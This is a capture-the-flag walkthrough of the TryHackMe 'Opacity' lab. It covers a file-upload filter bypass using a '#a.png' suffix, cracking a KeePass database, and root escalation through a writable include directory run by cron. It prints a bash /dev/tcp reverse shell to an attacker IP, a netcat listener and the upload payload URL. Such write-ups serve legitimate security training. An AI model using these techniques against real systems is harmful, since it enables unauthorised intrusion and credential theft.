TryHackMe Opacity is an easy machine that can help you in the penetration testing learning process. We perform file upload bypass in addition to exploiting cron job due to insufficient directory permissions. There are 2 hash keys located on the machine (user – local.txt and root – proof.txt). Can you find them and become root?
Initial Enumeration
The process kicks off with network scanning using nmap
.
nmap -A <target_IP>
This comprehensive scan (-A
switch) reveals the following open ports:
- Port 22: SSH (Secure Shell)
- Port 80: HTTP (Hypertext Transfer Protocol) – Identified as the primary initial attack surface.
- Ports 139 & 445: Samba (SMB/CIFS file sharing)
Web Server Analysis and Exploitation
Navigating to the web server on port 80 initially presents a login form. However, the video stresses bypassing this login and focusing on directory enumeration.
- Directory Brute-forcing: The tool
gobuster
is used to discover hidden directories.
gobuster dir -u http://<target_IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This scan uncovers a /cloud
directory.
File Upload Vulnerability: The /cloud
directory features an interface for uploading files via an external URL. This is identified as a vector for a reverse shell attack. The video specifically mentions using a “pen test monkey reverse shell” (a common PHP reverse shell) and highlights the necessity of configuring the attacker’s IP address and listening port within the shell script.
Hosting the Reverse Shell: To serve the malicious shell script for the upload, a simple Python HTTP server is started on the attacker’s machine.
python3 -m http.server 8000
Bypassing File Extension Filters: The initial upload attempt fails due to server-side validation expecting an image file. A clever bypass technique is demonstrated:
- The PHP reverse shell (e.g.,
shell.php
) is renamed by appending#
followed by a fake image extension (e.g.,shell.php#a.png
). - The web server processes the filename up to the
#
character (executingshell.php
), while the filter is tricked by the apparent.png
extension.
Triggering the Shell: After a successful upload using the crafted URL (e.g., http://<attacker_IP>:8000/shell.php#a.png
), the provided link to the “image” is accessed. Crucially, the #a.png
portion is removed from the URL in the browser to ensure the PHP code executes. This action establishes a reverse shell connection back to the attacker’s machine, which is listening for incoming connections (e.g., using nc -lvnp 4545
).
User Privilege Escalation
The initial reverse shell provides access as the web server user (often www-data
).
- Shell Stabilization: The raw shell is typically upgraded to a more interactive and stable shell.
- Internal Enumeration:
- The home directory of a user named
sysadmin
(/home/sysadmin
) is discovered. - Inside,
local.txt
(likely the user flag) and ascripts
directory are found. Attempting to readlocal.txt
fails due to insufficient permissions. - Further investigation in
/opt
reveals a file nameddata.kdbx
. This extension signifies a KeePass password database.
- The home directory of a user named
- KeePass Database Cracking:
- Transferring the Database: A Python HTTP server is started on the target machine within the
/opt
directory to serve thedata.kdbx
file.
- Transferring the Database: A Python HTTP server is started on the target machine within the
python3 -m http.server 80
Then, wget
is used on the attacker’s machine to download it.
wget http://<target_IP>/data.kdbx
Hash Extraction: The keepass2john
utility converts the .kdbx
file into a hash format that John the Ripper can understand.
keepass2john data.kdbx > keepass_hash.txt
Password Cracking: John the Ripper
is used with a wordlist (e.g., rockyou.txt
) to crack the master password for the KeePass database.
john --wordlist=/usr/share/wordlists/rockyou.txt keepass_hash.txt
Gaining User Access: The cracked master password opens the data.kdbx
file (using KeePassXC or a similar tool), revealing credentials for the sysadmin
user. These credentials are then used to log in via SSH.
ssh sysadmin@<target_IP>
Reading the User Flag: Once logged in as sysadmin
, the local.txt
file can be read.
cat /home/sysadmin/local.txt
Root Privilege Escalation
With sysadmin
access, the focus shifts to escalating privileges to root.
- Analyzing the
scripts
Directory: The previously found/home/sysadmin/scripts
directory contains:Library/
(a subdirectory)skill.php
(a PHP script) Examiningskill.php
reveals it’s a backup script that:
- Archives the
scripts
directory. - Copies the archive to
/var/backups
. - Deletes files from
/var/www/html/cloud/images/
. The script alsoinclude
s a file namedbackup.inc
from theLibrary/
subdirectory. It’s likely this script is run periodically by a cron job, potentially as root.
- Identifying the Vulnerability:
- An initial idea is to modify
skill.php
directly. However,skill.php
is owned by root and not writable bysysadmin
. - The key lies in the permissions of the
Library/
directory. WhileLibrary/backup.inc
is owned by root, theLibrary/
directory itself is owned bysysadmin
and is writable bysysadmin
.
- An initial idea is to modify
- Exploiting Writable Directory:
sysadmin
can delete the originalLibrary/backup.inc
.sysadmin
can then create a newLibrary/backup.inc
file containing a PHP reverse shell payload (configured with the attacker’s IP and a new listening port).
// Contents of the malicious backup.inc
<?php
// PHP reverse shell code targeting attacker's IP and port
shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker_IP>/<new_port> 0>&1'");
?>
- Gaining Root Access:
- A new netcat listener is started on the attacker’s machine on the
<new_port>
. - When the cron job executes
skill.php
(as root), it will include and execute the maliciousLibrary/backup.inc
. - This triggers the PHP reverse shell, connecting back to the attacker’s listener with root privileges.
- The root flag (
/root/root.txt
) can then be read.
- A new netcat listener is started on the attacker’s machine on the
This multi-stage attack effectively demonstrates common penetration testing techniques, from initial web server enumeration and exploitation to sophisticated privilege escalation tactics.
TryHackMe Opacity Room Answers
What is the proof.txt flag?